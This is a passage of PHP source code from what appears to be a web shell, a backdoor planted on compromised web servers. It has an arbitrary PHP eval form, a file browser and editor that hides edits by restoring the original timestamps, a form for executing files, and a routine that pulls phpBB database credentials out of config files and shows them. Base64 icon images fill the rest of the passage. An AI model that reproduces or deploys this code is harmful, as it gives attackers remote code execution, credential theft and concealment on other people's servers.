2050unset($line[5]);
2051$prcs[] = $line;
2052}
2053}
2054}
2055$head[$k] = "<b>".$head[$k]."</b>".$y;
2056$v = $processes_sort[0];
2057usort($prcs,"tabsort");
2058if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
2059$tab = array();
2060$tab[] = $head;
2061$tab = array_merge($tab,$prcs);
2062echo "<table class=explorer>\n";
2063foreach($tab as $i=>$k) {
2064echo "<tr>";
2065foreach($k as $j=>$v) {
2066if ($win and $i > 0 and $j == 4) { $v = view_size($v); }
2067echo "<td>".$v."</td>";
2068}
2069echo "</tr>\n";
2070}
2071echo "</table>";
2072}
2073}
2074if ($act == "eval") {
2075if (!empty($eval)) {
2076echo "Result of execution this PHP-code:<br>";
2077$tmp = @ob_get_contents();
2078$olddir = realpath(".");
2079@chdir($d);
2080if ($tmp) {
2081@ob_clean();
2082eval($eval);
2083$ret = @ob_get_contents();
2084$ret = convert_cyr_string($ret,"d","w");
2085@ob_clean();
2086echo $tmp;
2087if ($eval_txt) {
2088$rows = count(explode("\r\n",$ret))+1;
2089if ($rows < 10) {$rows = 10;}
2090echo "<br><textarea cols=\"115\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2091}
2092else {echo $ret."<br>";}
2093}
2094else {
2095if ($eval_txt) {
2096echo "<br><textarea cols=\"115\" rows=\"15\" readonly>";
2097eval($eval);
2098echo "</textarea>";
2099}
2100else {echo $ret;}
2101}
2102@chdir($olddir);
2103}
2104else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
2105echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"115\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
2106}
2107if ($act == "f") {
2108echo "<div align=left>";
2109if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
2110if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
2111else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
2112}
2113else {
2114$r = @file_get_contents($d.$f);
2115$ext = explode(".",$f);
2116$c = count($ext)-1;
2117$ext = $ext[$c];
2118$ext = strtolower($ext);
2119$rft = "";
2120foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
2121if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
2122if (empty($ft)) {$ft = $rft;}
2123$arr = array(
2124array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
2125array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
2126array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
2127array("Code","code"),
2128array("Session","phpsess"),
2129array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
2130array("SDB","sdb"),
2131array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
2132array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
2133array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
2134array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
2135array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
2136);
2137echo "<b>Viewing file: <img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
2138foreach($arr as $t) {
2139if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
2140elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
2141else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
2142echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
2143}
2144echo "<hr size=\"1\" noshade>";
2145if ($ft == "info") {
2146echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
2147if (!$win) {
2148echo "<tr><td><b>Owner/Group</b></td><td> ";
2149$ow = posix_getpwuid(fileowner($d.$f));
2150$gr = posix_getgrgid(filegroup($d.$f));
2151echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2152}
2153echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
2154$fi = fopen($d.$f,"rb");
2155if ($fi) {
2156if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
2157else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
2158$n = 0;
2159$a0 = "00000000<br>";
2160$a1 = "";
2161$a2 = "";
2162for ($i=0; $i<strlen($str); $i++) {
2163$a1 .= sprintf("%02X",ord($str[$i]))." ";
2164switch (ord($str[$i])) {
2165case 0: $a2 .= "<font>0</font>"; break;
2166case 32:
2167case 10:
2168case 13: $a2 .= " "; break;
2169default: $a2 .= htmlspecialchars($str[$i]);
2170}
2171$n++;
2172if ($n == $hexdump_rows) {
2173$n = 0;
2174if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2175$a1 .= "<br>";
2176$a2 .= "<br>";
2177}
2178}
2179echo "<table border=1 bgcolor=#666666>".
2180"<tr><td bgcolor=#666666>".$a0."</td>".
2181"<td bgcolor=#000000>".$a1."</td>".
2182"<td bgcolor=#000000>".$a2."</td>".
2183"</tr></table><br>";
2184}
2185$encoded = "";
2186if ($base64 == 1) {
2187echo "<b>Base64 Encode</b><br>";
2188$encoded = base64_encode(file_get_contents($d.$f));
2189}
2190elseif($base64 == 2) {
2191echo "<b>Base64 Encode + Chunk</b><br>";
2192$encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2193}
2194elseif($base64 == 3) {
2195echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
2196$encoded = base64_encode(file_get_contents($d.$f));
2197$encoded = substr(preg_replace(".{1,76}!","'\\0'.\n",$encoded),0,-2);
2198}
2199elseif($base64 == 4) {
2200$text = file_get_contents($d.$f);
2201$encoded = base64_decode($text);
2202echo "<b>Base64 Decode";
2203if (base64_encode($encoded) != $text) {echo " (failed)";}
2204echo "</b><br>";
2205}
2206if (!empty($encoded))
2207{
2208echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
2209}
2210echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
2211<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr>
2212<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr>
2213<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr>
2214<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr>
2215<P>";
2216}
2217elseif ($ft == "html") {
2218if ($white) {@ob_clean();}
2219echo $r;
2220if ($white) {tpshexit();}
2221}
2222elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
2223elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
2224elseif ($ft == "phpsess") {
2225echo "<pre>";
2226$v = explode("|",$r);
2227echo $v[0]."<br>";
2228var_dump(unserialize($v[1]));
2229echo "</pre>";
2230}
2231elseif ($ft == "exe") {
2232$ext = explode(".",$f);
2233$c = count($ext)-1;
2234$ext = $ext[$c];
2235$ext = strtolower($ext);
2236$rft = "";
2237foreach($exeftypes as $k=>$v)
2238{
2239if (in_array($ext,$v)) {$rft = $k; break;}
2240}
2241$cmd = str_replace("%f%",$f,$rft);
2242echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
2243}
2244elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
2245elseif ($ft == "code") {
2246if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
2247$arr = explode("\n",$r);
2248if (count($arr == 18)) {
2249include($d.$f);
2250echo "<b>phpBB configuration is detected in this file!<br>";
2251if ($dbms == "mysql4") {$dbms = "mysql";}
2252if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2253else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
2254echo "Parameters for manual connect:<br>";
2255$cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
2256foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2257echo "</b><hr size=\"1\" noshade>";
2258}
2259}
2260echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; 1em; 1em; 1em; 1em; background-color: ".$highlight_background .";\">";
2261if (!empty($white)) {@ob_clean();}
2262highlight_file($d.$f);
2263if (!empty($white)) {tpshexit();}
2264echo "</div>";
2265}
2266elseif ($ft == "download") {
2267@ob_clean();
2268header("Content-type: application/octet-stream");
2269header("Content-length: ".filesize($d.$f));
2270header("Content-disposition: attachment; filename=\"".$f."\";");
2271echo $r;
2272exit;
2273}
2274elseif ($ft == "notepad") {
2275@ob_clean();
2276header("Content-type: text/plain");
2277header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2278echo($r);
2279exit;
2280}
2281elseif ($ft == "img") {
2282$inf = getimagesize($d.$f);
2283if (!$white) {
2284if (empty($imgsize)) {$imgsize = 20;}
2285$width = $inf[0]/100*$imgsize;
2286$height = $inf[1]/100*$imgsize;
2287echo "<center><b>Size:</b> ";
2288$sizes = array("100","50","20");
2289foreach ($sizes as $v) {
2290echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2291if ($imgsize != $v ) {echo $v;}
2292else {echo "<u>".$v."</u>";}
2293echo "</a> ";
2294}
2295echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
2296}
2297else {
2298@ob_clean();
2299$ext = explode($f,".");
2300$ext = $ext[count($ext)-1];
2301header("Content-type: ".$inf["mime"]);
2302readfile($d.$f);
2303exit;
2304}
2305}
2306elseif ($ft == "edit") {
2307if (!empty($submit))
2308{
2309if ($filestealth) {$stat = stat($d.$f);}
2310$fp = fopen($d.$f,"w");
2311if (!$fp) {echo "<b>Can't write to file!</b>";}
2312else
2313{
2314echo "<b>Saved!</b>";
2315fwrite($fp,$edit_text);
2316fclose($fp);
2317if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2318$r = $edit_text;
2319}
2320}
2321$rows = count(explode("\r\n",$r));
2322if ($rows < 10) {$rows = 10;}
2323if ($rows > 30) {$rows = 30;}
2324echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href=''.addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2325}
2326elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2327else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}
2328}
2329echo "</div>\n";
2330}
2331}
2332else {
2333@ob_clean();
2334$images = array(
2335"arrow_ltr"=>
2336"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
2337"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2338"back"=>
2339"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2340"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2341"Wg0JADs=",
2342"buffer"=>
2343"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2344"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2345"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2346"change"=>
2347"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
2348"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
2349"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
2350"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
2351"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
2352"zMshADs=",
2353"delete"=>
2354"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
2355"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
2356"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
2357"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
2358"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
2359"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2360"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
2361"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
2362"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
2363"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
2364"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
2365"download"=>
2366"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
2367"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
2368"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
2369"forward"=>
2370"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2371"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
2372"WqsJADs=",
2373"home"=>
2374"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
2375"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
2376"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
2377"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
2378"mode"=>
2379"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
2380"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
2381"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
2382"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
2383"search"=>
2384"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
2385"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
2386"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
2387"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
2388"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
2389"setup"=>
2390"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
2391"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2392"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
2393"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
2394"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
2395"small_dir"=>
2396"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
2397"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
2398"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
2399"small_unk"=>
2400"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
2401"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
2402"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
2403"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
2404"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
2405"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
2406"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
2407"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
2408"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2409"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2410"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2411"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2412"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2413"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2414"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
2415"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
2416"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
2417"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
2418"yAsokBkQADs=",
2419"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
2420"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
2421"sort_asc"=>
2422"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
2423"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
2424"sort_desc"=>
2425"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
2426"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
2427"sql_button_drop"=>
2428"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2429"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2430"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2431"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2432"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2433"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2434"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2435"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2436"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2437"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2438"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2439"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2440"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2441"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
2442"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
2443"AQEAOw==",
2444"sql_button_empty"=>
2445"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2446"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2447"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2448"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2449"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2450"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2451"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2452"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2453"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2454"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2455"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2456"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2457"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2458"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
2459"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
2460"sql_button_insert"=>
